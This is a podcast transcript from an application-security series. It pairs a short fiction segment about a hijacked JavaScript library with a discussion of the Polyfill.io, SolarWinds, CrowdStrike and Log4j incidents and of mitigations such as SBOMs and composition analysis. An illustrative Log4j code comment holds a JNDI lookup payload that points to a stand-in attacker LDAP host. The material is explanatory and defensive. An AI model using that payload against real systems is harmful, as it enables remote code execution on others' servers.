Podcasts

Episode 4: Another Code Brick in the Wall

Software supply-chain security is one aspect of cybersecurity that affects every sizable application out there and also every organization that uses web apps and APIs. Application frameworks and libraries make up much of the running code base of modern software—and it only takes one vulnerable or compromised component to create a critical security gap.
 
In this episode, Frank Catucci and Dan Murphy dig into supply-chain security and look at several high-profile breaches caused by insecure components and dependencies. In the fiction segment, Alice the head dev realizes that the vulnerable library the CISO is asking about is used in lots and lots of places…

December 17, 2024

Transcript

Episode Four: Another Code Brick in the Wall

Alice really didn’t want to go to work today. She had an early morning call organized by Bob, the new CISO, to go over some random legacy site that everyone assumed she knew about—simply because she had been at the company, working on something totally different, around the same time it was created. At least she got to miss the morning standup. She was honestly only half paying attention, swiping left and right on the flood of IMs that she could barely keep up with. But her ears perked up when she heard Bob speaking:

“Can anyone confirm if we are actually using TrolleySpill?”

Alice remembered hearing something about that in the Taut channel where the black-hoodie crew of the AppSec team hung out. TrolleySpill was some popular JavaScript package used in hundreds of thousands of sites, from what she recalled. It had been created as a free tool to make web developers’ lives easier—a way to easily drop in compatibility with old browsers. People started using it and including it on their sites. It was a free lunch; what could possibly go wrong?

But then the maintainer got burned out and sold the source control account and the domain that hosted the code to a sketchy company. That company, in turn, decided to monetize the install base. They had code trusted and running in hundreds of thousands of sites. It was as if your favorite local salad shop, which had been dutifully delivering high-quality produce every day, had been sold to some big soulless profit-chasing chain, and the regular delivery was now infested with vermin. What once was green and good had now been corrupted.

Alice was zoning in and out and decided to just check out the site in question. She opened the source and did a Control-F search for the compromised domain in the HTML. Oh no, oh no, oh no, oh no…

Her laptop fan kicked on. The site became slow, as if gravity had tripled. She fought against the weight and popped open her browser’s dev tools. What were all these scripts coming in from weird misspellings of big tech sites? And what was that repeated request from an image tag to a transparent GIF hosted somewhere else? 

Wait—was that her session cookie appended to the URL?

Didn’t this crappy old site have a way that you could just see your old password? Had she used SSO, or had she just accidentally leaked a way to get her corporate password? The site slowed to a crawl. An iframe stacking ads for things not entirely safe for work started to bloom like rot on the page. Finally, her browser gave up and displayed, “The following pages have become unresponsive. Do you want to cloose them?” The word “close” was spelled wrong—“cloose.” It was a trap.

Control W, control W, control slam that tab closed… Alice cleared her throat.

“Um, Bob, sorry to interrupt, but I just checked to see if we use TrolleySpill on that site. We do. A lot.”

Bob’s mind flashed back to a weekend in a cold December when he found out about another supply chain attack. His eye began to twitch uncontrollably as he remembered the horror of the first few hours of that incident. He paused for a moment and then asked the question everyone was thinking.

“And, uh, if we use it on that site, how many other apps do we have in the organization that use that?”

Alice typed for a few moments. “If we consider all of the partners, all of the dev branches that were deployed but never cleaned up, that would be 152 that we know about. Oh, and then there’s all the ones from that dead project. Uh, that’s like another 50. And we did that weird microsite back then. Uh, I think that branched from the code… Can we go with ‘lots’?”

The nightmare was becoming more real. Bob spoke slowly. “There is no way we can check all that. We wouldn’t even know where to begin.”


Frank Catucci: Hello and welcome to another episode of AppSec Serialized. I’m your host, Frank Catucci, and with me as always is Dan Murphy. Our topic today is supply chain security. Dan, this is an issue that’s been ongoing for a number of years and still affects a huge number of organizations out there, nearly every one of them, really.

Dan: Oh yeah, definitely.

Frank: One of the things for me when we talk about this is looking at the evolution of how software is written these days—modern software development, modern application development—as opposed to how it was written 15 years ago. I think that’s part of the reason why this is still such a hot topic. You’d think we’d have had enough time to examine all the different aspects of this evolution and made some progress, but despite the progress we’ve made, it’s still a very relevant conversation. You know what I mean? It’s something that continues to affect everyone today. What are your thoughts on that?

Dan: Supply chain security is interesting because it’s something that has continued to impact us as applications grow more complicated. I like to use a metaphor here about software being built from Lego blocks. Back in the day, you had pretty basic blocks—your square ones, your long ones, your 2x2s—but nowadays there are a lot of specialized Lego pieces. You can have half of the model being built entirely from one part, and the number of Lego pieces used has just exploded. 

Modern apps are composed of many, many individual bricks that are sometimes just downloaded from the internet without going through the same rigorous process that’s applied internally to software written in-house—things like code review, static analysis, or security testing with a DAST tool. Sometimes when you’re getting it off the internet, you don’t ask questions about what rigor has been applied, where it’s come from, or what its origin is. Those Lego blocks that you end up putting into your solution sometimes have cracks, and when they’re at the bottom, the whole model can topple down. So, I believe we’ve got apps now that are built with a degree of unknowable complexity in terms of their dependencies that we really haven’t seen before. 

I actually had a personal experience last week. I was prototyping some code in this glorious haze of ChatGPT-assisted development, and I needed to clean out a dependencies directory for a TypeScript project I was working on. I ran an “rm -rf” on the directory, and it took a surprisingly long time to finish. The reason was that I had introduced so many third-party dependencies into what was supposed to be a pretty simple app. The stack had become so big that the code I was writing sat at the top of a pyramid of all these different layers. In software security, all it takes is just one of those layers in the pyramid having a crack.

So supply chain security is here to stay, and as our solutions grow more complex and our dependency chains grow longer and longer, it only becomes more important.

Frank: You brought up something super interesting there that I want to dive into a little deeper. You mentioned things like manual code review. Let’s be completely honest—how many of those third-party libraries or dependencies are actually going through any type of manual code review with the same level of scrutiny as the first-party code written by yourself or a key contributing developer? How often would you say that folks out there are actually looking at those Lego blocks and doing a full assessment with the same rigor, including manual code review, as they would for first-party code? 

Dan: The answer is that it varies. In an open-source project, sometimes you can have a maintainer who’s incredibly diligent—a sort of benevolent dictator—reviewing every single line and making sure everything is up to par. You can have high-quality code out there, but when you have a wide, wide chain of dependencies, security becomes an issue where all you need is one gap. 

Even if you consider the average quality to be high, even if there are great people out there doing a lot of social good by staying diligent, all it takes is for one person to slack off, or for one burned-out developer to miss something. We’ve seen threat actors take advantage of burned-out open-source developers to sneak something malicious into the code. So, I think it varies quite a bit. When it varies, you have no way of knowing, so from a threat modeling perspective, you have to assume the worst. 

If your app has a thousand external dependencies, even if you assume a 90% quality rate, when you multiply that by the number of dependencies, the math doesn’t work out so well.
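To put rough numbers on Dan’s point, treating each dependency as independently trustworthy with some fixed probability (which is of course a simplification), the compounding works out roughly like this:

    0.9 ^ 1000   ≈ 2 × 10^-46
    0.99 ^ 1000  ≈ 4 × 10^-5
    0.999 ^ 1000 ≈ 0.37

Even if every one of a thousand components is 99.9% trustworthy, the odds that all of them are clean are barely better than one in three.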

Frank: But even if you have a maintainer or author who is very diligent in reviewing the code before it’s pushed, as an end-user or consumer of those blocks—those different libraries or pieces—you still need to do your own reviews of that code, regardless of whether it’s from someone you trust or has been previously reviewed by another party. 

That’s something we can’t simply rely on; we need to make sure we’re looking at it ourselves. But with the volume of libraries and code we’re using, it becomes really untenable to review every line the way you would with first-party code instead of relying on somebody else to do it, and that’s where things really get complicated.

Dan: There have been some recent incidents that really reinforce the risks we face in cybersecurity. Sometimes, what was once good can go bad, much like milk left out on the counter. A great example of this is the Polyfill vulnerability that emerged recently. In that case, we had a third-party package called Polyfill, used on hundreds of thousands of websites. It was originally designed to provide compatibility with older browsers and was a very useful piece of software, especially a few years ago when there was more diversity in the front-end ecosystem. It allowed developers to add new functionality to browsers that didn’t yet support certain features. For many years, it was a fine, trustworthy package that did its job well.

However, in February 2024, something happened. The developer who originally created Polyfill sold it to a different company. The project, and crucially the polyfill.io domain that served the code to browsers, was now controlled by someone else. It’s kind of like your favorite pizza joint suddenly changing ownership while keeping the same name—you no longer know what’s going into the ingredients. In this case, the “pizza joint” was taken over by someone with a nefarious purpose. They began embedding malicious scripts into all the websites that were using the package.

Polyfill was distributed via a content delivery network (CDN), which is a way to serve JavaScript from another location, ideally closer to the user, to reduce transmission times. Many people were still downloading the package from the Polyfill.io CDN, unaware that what was once a perfectly good resource had gone bad. The malicious code began executing various attacks, such as using CPU cycles to mine cryptocurrency, injecting malware, or driving ad revenue through shady means.

This was so impactful because the package was perfectly good before this change. Even if someone had done a review at the time of introduction, nothing would have raised any red flags. An internal review board would likely have said, “Yeah, this is great, this is well-maintained, this is used everywhere, it ticks all the boxes”—until it doesn’t. So, oftentimes, even when that due diligence is done at the front end of a project, when you’re selecting a library for use, you look at it and ask, “Okay, is this good?” But once it’s in, it can change very easily, and it’s easy to let scrutiny lapse as we take updates to software.

It’s very easy to just install the latest version and assume everything’s okay. In fact, this attack took advantage of exactly that: sites were loading the script directly from that location on the content delivery network, so the latest version was always in use. But when that latest version goes bad, that’s when we have problems.
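To illustrate the delivery mechanism Dan describes, a single hotlinked script tag was typically all it took. The URL below is representative (exact paths and feature lists varied by site); because the file was fetched live from the polyfill.io domain on every page load, whoever controlled that domain controlled the code running in visitors’ browsers:

    <!-- Hotlinked from a third-party domain: the page runs whatever that domain serves today -->
    <script src="https://cdn.polyfill.io/v3/polyfill.min.js?features=default"></script>

Pinning a subresource integrity hash or self-hosting a frozen copy are the usual ways to avoid trusting a remote host’s “latest” indefinitely, though integrity hashes can’t be used with services that tailor the script to each visiting browser.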

Frank, what are some other supply chain attacks you’re familiar with, ones you’ve got personal memories of?

Frank: You know, there’s one that—it was a little while ago, right, so some time has passed—but it eerily reminds me of the classic supply chain attack you mentioned, where you always have to rely on something that’s trusted, from a trusted location. And that would be—let’s go back and look at SolarWinds, right? Let’s look at the impact that the SolarWinds attack had.

Now, let’s look at this in chronological order. In September 2019, attackers were able to gain access to the SolarWinds network. So that, in itself, was a separate successful attack, and the attackers were like, “Hey, we have access now to the SolarWinds network.” They started to test their code injection as part of this access in October 2019. This is where things get interesting, because what occurred over the next four months matters: when you have four months of access to hone and practice your skill of essentially injecting malicious code into products from an internal network, you’re going to get to a position that you feel pretty good about, right?

We’re talking four months of probably basic trial and error and practice. By February 2020, they had injected malicious code called Sunburst into the Orion product that SolarWinds distributes. In March 2020, SolarWinds began distributing those Orion updates, and what got pushed out was an update containing all of that malicious code. Once a victim’s system was compromised, it gave the attackers access to all of those machines on the customer side that were running the SolarWinds Orion software.

So, you started out with one internal compromise, then you inject malicious code. That malicious code looks like it’s trusted, right? So, you as a consumer are trusting that update coming from SolarWinds that has malicious code. That malicious code makes it onto your systems, and now you have full access to all of the customer systems from that malicious software that came from the trusted source. This is something that is absolutely incredible when you talk about a trusted source becoming compromised and the impact that can occur. You know, SolarWinds, like other software out there, is very widely used in federal government and infrastructure, in the private sector as well as the public sector. So, these are things that can have tremendous impact, and this is one that is still felt, I think, today.

A little bit of an aside from software supply chain attacks: let’s look at the dangers of pushing out bad updates from a trusted source. I don’t want to pick the scab too soon, but in one case, something that wasn’t even malicious, a corrupted file consumed by a kernel-level driver from CrowdStrike, ended up taking down critical infrastructure across the entire globe, essentially. And, I mean, it wasn’t malicious at all; it was a mistake.

Dan: One of the things that’s interesting about that is, if you’re a threat actor, you realize that even though this was a mistake, like a null-byte file that trusted kernel code was parsing and wasn’t prepared to deal with, it opens a lot of eyes in terms of risk. Look at the amount of economic damage that a few null bytes in the wrong place were able to do. I think that’s the sort of thing a threat actor looks at and thinks, “Oh, you know what, I could do that.” Imagine how widespread the impact can be, even from an update that isn’t necessarily code. By hitting that supply chain, an attacker amplifies their efforts and gets a lot of return on investment. It magnifies everything, and it’s a bit of a wake-up call.

Frank: Yeah, absolutely. I mean, just today, if you’re talking about impact, we have a major airline that is now under federal investigation by the Secretary of Transportation. So, you know, these things have real impacts.

Now, that being said, I think we would be remiss not to talk about our classic example, the one that ruined another weekend—and that was Log4j, right? 

Dan: You know, CrowdStrike was on a Friday; Log4j, I’m pretty sure, was either a Thursday or a Friday, from what I remember. These things always seem to happen at the worst possible time.

Frank: Log4j might have started on a Thursday night, Eastern time, but the technical impact was definitely felt on Friday.

Dan: The Log4j vulnerability was interesting, right? For those not familiar, this was an open-source component—a Lego brick, if you will, from our earlier analogy—that was very widespread. It was free, it was good, and pretty much any large enterprise Java code had this running inside of it. But it was vulnerable. It had a flaw where an attacker could exploit it easily. The attack vector was simple: all a bad guy had to do was get the software using this third-party library to log some text that contained a string under the attacker’s control. Now, if you consider some exploits where an attacker has to, like, Matrix-style dodge through, backflip over things, and pull off some complex moves—this wasn’t that. This was the equivalent of just going up and knocking on the front door and having it simply open. It was a very easy-to-exploit attack vector, combined with the ultimate power of remote code execution (RCE).

What would happen is that the attacker could send a special string containing what’s known as a JNDI URL. When the system logged that string, Log4j would interpret it as a lookup and connect to an LDAP server at a URL controlled by the attacker. The system would then download something from that server, and in the context of the Java ecosystem, it was loaded as Java object data, which meant deserialization—leading to the execution of code. So, basically, a machine vulnerable to Log4j had a severe vulnerability where an attacker could send a particular string that would tell the software to go out to the internet, download, and execute code of the attacker’s choosing.
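As a minimal sketch of the pattern Dan describes (class and variable names here are purely illustrative): in Log4j 2 versions before 2.15.0, lookups embedded in logged text were resolved automatically, so any attacker-controlled string that reached a log call could trigger the JNDI connection.

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LoginHandler {
        private static final Logger logger = LogManager.getLogger(LoginHandler.class);

        void recordFailedLogin(String username) {
            // If username arrives as "${jndi:ldap://attacker.example.com/a}",
            // vulnerable Log4j versions resolve the lookup, connect to the
            // attacker's LDAP server, and can load and execute remote code.
            logger.warn("Failed login attempt for user " + username);
        }
    }

Upgrading to the patched 2.17.x releases was the eventual fix; removing the JndiLookup class from log4j-core was the widely used stopgap in the meantime.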

That was about as bad as it could get. I remember the mounting horror as everyone scrambled to determine whether or not the Log4j version in their code was vulnerable. And there were aftershocks, too. It wasn’t just one issue; there was the big one, and then after that, a whole bunch of scrutiny was directed at that particular package. Some of us had to patch twice; it was painful.

Frank: Or even two or three times, right?

Dan: Yep, and even then, just like with CrowdStrike, there were people celebrating being so old that they weren’t vulnerable. The same thing happened with Log4j—there were some versions that were ancient and not vulnerable. But that’s grim solace; it’s not really a good thing. I, for one, don’t want to fly on an airline that’s running Windows 3.1, personally.

Frank: I’m with you there. 

One thing that I want to point out is that this was something that was essentially open and available, being used across probably hundreds of thousands of applications of different types, for various purposes. This was something that almost every organization probably had at some point, somewhere in their own software or in third-party software they were using.

So, it wasn’t necessarily a product-specific type of attack; it was more of a component-level attack. But that component was so common across so many different types of software, whether first-party or third-party, that the impact was incredible. It doesn’t have to come from one specific trusted vendor; it just has to be a component that’s implemented everywhere. I don’t think we’re done with this yet. There’s so much out there that it’s going to continue to be interesting.

Dan: When we define supply chain security, it can be a broad term, but with that disclaimer, how widespread is the problem? How many organizations do you think have had to deal with a supply chain security attack? What do you see out there?

Frank: This is something I’ve been looking at carefully. I would say in 2022, the data I have states that around 80% of enterprises had some type of software supply chain incident. To me, that was astronomical. However, a 2024 survey from ESG stated that 91% of organizations have experienced a software supply chain incident in the past 12 months. So, you went from 80% in 2022 saying they’ve ever had an incident with a software supply chain, to 2024 where more than 9 out of 10 were impacted by a software supply chain incident in the past 12 months. That is an incredible statistic. 

If you’re an enterprise, even if you haven’t had an incident in the past 12 months, and you probably have, there’s better than a 90% chance you’re going to have one in the near future. That impact and that percentage alone mean this needs to be taken more seriously and acted upon with more priority, especially given the consequences. 91% within the last 12 months is a staggering number.

Dan: That is a very big number. But when we talk about the threats, what about mitigation? What can we do about it? 

Frank: There are some areas where we’re limited. If we’re taking updates or auto-updates from a trusted software package, it’s tough to plug all the holes; there’s always going to be some level of risk in accepting those kinds of updates. But if we take a broader look at the software supply chain as a whole, what are some things we can do to be more secure?

We touched upon some of this earlier, but it’s about trust and verification, right? We need to understand two things. First, what our software is running: we need a comprehensive list, an SBOM (software bill of materials), of everything the software is running—every piece, every Lego brick that makes up the pyramid, or however you want to visualize that model. It’s crucial to understand what’s included, so you need an accurate list. But that accurate list only scratches the surface. It’s the inventory, and it’s hard to protect what you don’t know you have, so you need to conduct a discovery process to make sure you fully understand that detailed inventory of Lego bricks.

The second point is maintaining the same level of standards and scrutiny that you would apply to first-party code. You need to make sure you’re looking at the libraries and the versions of those libraries, and that you’re doing code testing on them as well. Just because you didn’t write it doesn’t mean you should ignore security findings or issues flagged by tools like SAST.

Dan: One thing that is nice about this problem is that it lends itself well to automation. There are SCA (software composition analysis) tools out there that can help. They produce that SBOM, that manifest of all the components, and they check if the versions in use are known to be secure. They also track how long it has been since those components were last updated. These tools can help with other aspects as well, such as identifying license violations. Generally speaking, there are robust databases that track CVEs (Common Vulnerabilities and Exposures), so if a vulnerability emerges in a widely-used package, these databases will be updated and will notify you about it. There are even vendors that can help you out if you don’t have access to the source code. 
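As a small illustration of what such a manifest contains, a minimal CycloneDX-style SBOM entry might look something like the fragment below (the package name and version are purely illustrative):

    {
      "bomFormat": "CycloneDX",
      "specVersion": "1.5",
      "version": 1,
      "components": [
        {
          "type": "library",
          "name": "left-pad",
          "version": "1.3.0",
          "purl": "pkg:npm/left-pad@1.3.0"
        }
      ]
    }

Each entry carries enough identity (name, version, and a package URL) for tooling to match the component against vulnerability databases automatically.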

We do a bunch of stuff at runtime where we analyze the public-facing surface of a web application using the same tools that an attacker might use. We check things like the version of the JavaScript framework in use, or whether the headers in your HTTP responses indicate a certain age or vulnerability in the software. With Polyfill, we were able to get a check out really quickly, within a day or two of it hitting the mainstream. It’s kind of cool because if you then encounter something that was once good but has now become problematic, you can get a notification. So, automation really helps in combating these issues. The scale and scope are such that it’s almost impossible to keep up without the appropriate tools, but fortunately, there are potential solutions available.

Frank: You bring up some good points. There are automated tools and processes to help with this, like SCA, and we also offer runtime component analysis. This isn’t just about what’s compiled into the application, but what’s actually being called, used, or exposed at runtime. This can also aid in prioritizing what to fix and when, and how immediate that fix needs to be. Another point to consider is that we’re under increasing scrutiny. As a result of incidents like SolarWinds, we now have executive orders signed by the president stating that you can’t ship code with critical or high vulnerabilities. This increased scrutiny is something we need to be very aware of going forward.

If we look across the board at how this is evolving, it’s clear that the focus goes beyond what we traditionally thought of as the software supply chain. We’re likely to see more expansion in federal leadership and scrutiny around issues like this. The software supply chain as a whole is going to face stricter and stricter regulations, and this is something we need to be well-prepared for in the future.

Credits

COMING SOON

Episode 5: CISO on the Seesaw

In this episode, Frank Catucci and Dan Murphy talk to a real-life CISO, Invicti’s own Matthew Sciberras, discussing the balancing skills required to define and apply application security policies with limited resources. In the story segment, Alice the head dev realizes her cherished new project will be delayed due to vulnerabilities—if only she had scanned earlier…

